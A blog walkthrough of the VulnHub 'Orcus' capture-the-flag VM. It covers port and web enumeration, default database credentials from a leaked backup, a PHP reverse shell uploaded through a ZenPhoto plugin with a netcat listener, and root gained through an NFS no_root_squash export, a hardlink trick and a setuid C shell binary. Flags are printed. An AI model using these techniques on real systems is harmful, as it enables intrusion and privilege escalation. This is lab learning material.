VulnHub Orcus Solution

      No Comments on VulnHub Orcus Solution

For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.

Orcus

Intro

This is the last of 3 incrementally difficult CTF’s created for HackFest 2016 [email protected] and released on the VulnHub platform.

Link – https://www.vulnhub.com/entry/hackfest2016-orcus,182/

Difficulty –Hard

My Solution

As always start with an NMAP Scan to see what ports are open.

[email protected]:~/orcus# nmap -p- -Pn -A -v -oX orcus_nmap.xml 192.168.5.15
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-23 13:14 GMT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:14
Completed Parallel DNS resolution of 1 host. at 13:14, 0.00s elapsed
Initiating SYN Stealth Scan at 13:14
Scanning 192.168.5.15 [65535 ports]
Discovered open port 993/tcp on 192.168.5.15
Discovered open port 53/tcp on 192.168.5.15
Discovered open port 110/tcp on 192.168.5.15
Discovered open port 445/tcp on 192.168.5.15
Discovered open port 111/tcp on 192.168.5.15
Discovered open port 443/tcp on 192.168.5.15
Discovered open port 995/tcp on 192.168.5.15
Discovered open port 139/tcp on 192.168.5.15
Discovered open port 143/tcp on 192.168.5.15
Discovered open port 80/tcp on 192.168.5.15
Discovered open port 22/tcp on 192.168.5.15
Discovered open port 51994/tcp on 192.168.5.15
Discovered open port 44123/tcp on 192.168.5.15
Discovered open port 43229/tcp on 192.168.5.15
Discovered open port 54377/tcp on 192.168.5.15
Discovered open port 2049/tcp on 192.168.5.15

Looks very similar to the last two with a couple of extra services running.

Port 80 is showing the standard splash screen.

I started Nikto in the background and started looking at the service enumeration results.

Everything looked pretty standard except port 443 wasn’t HTTP or HTTPS it was instead another ssh port.

443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)

2 ports listening or incoming ssh connections seemed a bit odd. There were no banners running on either port. So nothing to really help there.

Nikto was still running so I decided to look at some more service.

NMAP Scripts show that samba is running and accepting guest logons

Host script results:
|_clock-skew: mean: 55m03s, deviation: 0s, median: 55m03s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ORCUS<00>            Flags: <unique><active>
|   ORCUS<03>            Flags: <unique><active>
|   ORCUS<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-23T10:22:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

enum4linux is a tool on Kali for enumerating SMB services. There are no open shares or vulnerabilities on this version but there is a list of users and groups, The most interesting element is:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

Kippo is a medium interaction SSH honeypot and I have spent a lot of time using this tool :) This also explains the two SSH Ports.

NFS is also open so lets see if there are any shares on here. Nmap includes some useful scripts for enumerating open NFS Shares

[email protected]:~/orcus# nmap --script nfs-* 192.168.5.15
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-23 14:15 GMT
Nmap scan report for 192.168.5.15
Host is up (0.11s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
| nfs-ls: Volume /tmp
|   access: Read Lookup Modify Extend Delete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| ??????????  ?    ?    ?     ?                    .
| rwxr-xr-x   0    0    4096  2016-10-31T03:05:46  ..
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .ICE-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .Test-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .X11-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .XIM-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .font-unix
| rwx------   0    0    4096  2017-03-23T08:43:01  systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids
| rwx------   0    0    4096  2017-03-23T08:42:58  systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io
| rwx------   0    0    4096  2017-03-23T08:42:59  vmware-root
|_
| nfs-showmount: 
|_  /tmp *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /tmp        7608792.0  3621728.0  3577516.0  51%   8.0T         32000


Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
[email protected]:~/orcus#

/tmp from the target is exported as a share that we can reach, Looks like we can read and write but not execute. I test this by mounting the share on my local host and creating a file. (You may need to apt-get install nfs-common)

[email protected]:~/orcus# mkdir nfsmount
[email protected]:~/orcus# mount -t nfs 192.168.5.15:/tmp nfsmount
[email protected]:~/orcus# cd nfsmount
[email protected]:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            vmware-root
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL
[email protected]:~/orcus/nfsmount# echo 'test' > test.txt
[email protected]:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            test.txt
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL  vmware-root
[email protected]:~/orcus/nfsmount#

Doesn’t seem to be much more we can gather from this so I head back to my nikto results which have just finished.

There is a lot of information in here. The robots.txt file had 30 entries which caused some noise. I started going through all the results with some interesting finds.

  • Multiple index files found: /index.html, /index.php

Index.html is our splash screen, Index.php shows an error message about a database being offline.

This also identifies the software in use as Exponent CMS, which we could also gather from the other results in nikto.

  • Entry ‘/INSTALLATION.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)

This was also repeated for other files like TODO.md and README.md. By looking at these files we can determine the version number is most likely 2.0.

Searchsploit returned a few potential vulnerabilities that could be of use but the files where either missing from the install or as it was not configured for DB access there was no valid SQL injection.

  • /phpmyadmin/: phpMyAdmin directory found

There is an installation of phpmyadmin but no version numbers listed anywhere. I tried a few known exploits but nothing worked so I started to expand my search. I wondered what else might be installed so I threw dirbuster at the web server.

My first scan with dirbuster is always a fast scan with NO recursion. Some web apps have deep directories and they can take a long time to scan. If I want to scan recursively I do it per folder by settings the Dir to start with field.

Much the same as Nikto found but we also found a backup folder that says it contains ssh-creds.bak

Trying to read the creds file results in a 403 forbidden response, but the SimplePHPQuiz-Backup.tar.gz file is accessible

After saving and extracting the archive I start navigating the source code. I find a db_conn.php file that looks like it still contains the default configuration.

<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";
    exit();
}

?>

I try these creds in the logon form for  phpmyadmin and success im in. This account has full privileges the same as the mysql root account.

I try to read and write files out to get more information or create a php shell but the MySQL Server has been started with increased security preventing this.

Lets see what else we have.

Most of the tables are empty.

The zencart database is populated and has admin creds configured. There are vulnerabilities if I can identify the version. To do this I need to figure out the install path. It’s not in any of the tables and dirbuster didn’t find it either.

I try the obvious entries like /zencart/ /cart /store with no luck . I throw other dictionaries at dirbuster again without success.

Next I look to see if any of the other tables have directories, I have the source for the phpquizz maybe there is a vulnerability in there somewhere i can find.

I wasn’t far of as I’m checking the tables I find zenphoto 1.4.10 is present on the server but not installed yet.

As luck would have it there is a known vulnerability with this version all we need to do is install it first.

Configure the SQL DB Options with our credentials dbuser | dbpassword, click save and then Go :) From here just follow the setup steps to get you admin account logged in.

Grab the details of the exploit from searchsploit and test them out

[email protected]:~/Desktop/setec-vpn# searchsploit zenphoto 1.4.10
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                |  Path
                                                                                                                              | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
ZenPhoto 1.4.10 - Local File Inclusion                                                                                        | php/webapps/38841.txt
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
[email protected]:~/Desktop/setec-vpn# searchsploit -p 38841
Exploit: ZenPhoto 1.4.10 - Local File Inclusion
    URL: https://www.exploit-db.com/exploits/38841/
   Path: /usr/share/exploitdb/platforms/php/webapps/38841.txt

Copied EDB-ID 38841's path to the clipboard.
[email protected]:~/Desktop/setec-vpn# 

It’s a local file include that should be easy to trigger but it just wont work :(

I start thinking of other ways to get files uploaded or php code running on the server. I spot tabs for themes and plugins. These are ideal places to upload and inject php code that I can use to get command line access.

Themes are not editable from the web UI so that’s out , at first glance its the same for plugins, they can not be edited or uploaded from the Web UI but there are several that are installed but not enabled. . . Including a file uploader.

Enable this and head to the upload page and we can now push up any files we like. I start with my favourite php reverse shell from pentest monkey.

Any files we upload are placed in to http://192.168.5.15/zenphoto/uploaded/ and we can browse this folder in the browser and, after starting a netcat listener, open our shell.php page.

[email protected]:~/Desktop/setec-vpn# netcat -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.15: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.15] 39818
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
 16:03:05 up 45 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Now I have a shell its on to my usual hands on  routine

  1. Spawn a tty shell
  2. file listing to web root
  3. Search for flags
  4. upload linux enumeration script.
[email protected]:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
/var/www/flag.txt
[email protected]:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
868c889965b7ada547fae81f922e45c4
[email protected]:/$
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$ find / > /var/www/html/dirs.txt
find / > /var/www/html/dirs.txt
[email protected]:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
/var/www/flag.txt
[email protected]:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
868c889965b7ada547fae81f922e45c4
[email protected]:/$ 

The benefit of writing dirs to the html dir is that I can download these files with a browser. I could also move these all to /tmp/ where I know I can write and read files using NFS.

After running the highon.coffee Linux Enumeration script there are some interesting elements, I confirmed that kippo SSH Honeypot is running in the background and the real SSH is running on 443.

I check the kippo logs incase our users accidentally logged in to the honeypot instead of the host device. a Mistake I have never made :P Honestly.

There are no logs in the log or tty dir so I check the config incase they are being written anywhere else. Sadly not but I did find an extra flag for my troubles.

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

Back to the search for root and I couldn’t find much that helped me. I tried to read the ssh-creds.bak file that had evaded me earlier but it was write only.

total 224K
d-wx--x--x 15 www-data www-data 4.0K Mar 25 07:15 ..
drwxr-xr-x  2 www-data www-data 4.0K Nov  1 21:33 .
--w-------  1 www-data www-data   12 Nov  1 21:33 ssh-creds.bak
-rw-r--r--  1 www-data www-data 211K Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz

In a moment of desperation I started throwing random priv esc exploits at the box with no luck.

After a lot of time wandering around the box I started looking for misconfigured services that may have a way in as root. (should have started here really)!

From the list of processes running as root, Samba, NFS and Dovecot look like prime targets.

Starting with samba I had already enumerated a lot of this earlier, so I started checking the smb.conf file for anything out of place.

Everything looked pretty standard.

Next was NFS. Looking in /etc/exports everything seemed to look OK at first glance but I didn’t know a lot about NFS other than setting up some basic exports. So I took to google. The following posts gave me a lot of information to get started on exploiting NFS

The first post I started reading was nfs hardlinks from pentest monkey using this technique I could create a hard symlink from a file to the tmp dir (the export dir) and then view the file on my host from the mounted share.

I figured a good test would be the ssh-creds.bak file.

On the target run:

[email protected]:/etc/kippo$ cd /tmp 
cd /tmp
[email protected]:/tmp$ ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
[email protected]:/tmp$ 

Then from my host I can just browse in to the mounted folder and view the files

[email protected]:~/VulnHub/Orcus# mkdir nfsmount
[email protected]:~/VulnHub/Orcus# mount -t nfs 192.168.5.15:/tmp nfsmount
[email protected]:~/VulnHub/Orcus/nfsmount# ls
ssh-creds.bak                                                            systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io  vmware-root
systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids  test
[email protected]:~/VulnHub/Orcus/nfsmount# cat ssh-creds.bak
root:123456
[email protected]:~/VulnHub/Orcus/nfsmount# 

These are the default creds for kippo so I think I’m being trapped here but I try them on the real ssh port anyway with no success.

At the end of the blog post they suggest that if root_squash is enabled then I should be able to access more privileged files like shadow.

I tried several times without success so I went back to reading up on NFS and exploiting no_root_squash.

The blog posts focused on copying a binary that i could set to run with root privileges regardless of the user that launched the application.

The examples used vi to edit the shadow and passwd files. I couldn’t get them to function. I tried the same technique for the sh file to get a root shell again with no joy. The shell would launch but with my normal permissions.

After trying the examples and failing i moved on to the next technique. This involved compiling your own c code that would start a bash shell. I used the example C code from highoncoffee 

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

On my host create the file.

One the target compile the binary

[email protected]:/tmp$ gcc -o suidbash suidbash.c
gcc -o suidbash suidbash.c
suidbash.c: In function 'main':
suidbash.c:2:8: warning: implicit declaration of function 'setresuid' [-Wimplicit-function-declaration]
        setresuid(0, 0, 0);
        ^
suidbash.c:3:8: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
        system("/bin/bash");
        ^
[email protected]:/tmp$ 

On my host set the suid bit

[email protected]:~/VulnHub/Orcus/nfsmount# chown root:root suidbash
[email protected]:~/VulnHub/Orcus/nfsmount# chmod u+s suidbash
[email protected]:~/VulnHub/Orcus/nfsmount#

Back on the target execute the file

[email protected]:/tmp$ ./suidbash
./suidbash
[email protected]:/tmp# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp# 

And enjoy the root shell goodness that ensues :) It’s important to chown before chmod as chown will remove the suid bit.

Now for that root flag to finish it off.

[email protected]:/tmp# find / -name flag.txt
find / -name flag.txt
/root/flag.txt
/var/www/flag.txt
[email protected]:/tmp# cat /root/flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe
[email protected]:/tmp# 

And that completes the series. I had a lot of fun working my way through these and learnt a lot along the way. A big thanks [email protected] for creating the series and of course to @VulnHub for hosting them all.

As usual Questions, Queries, Comments below.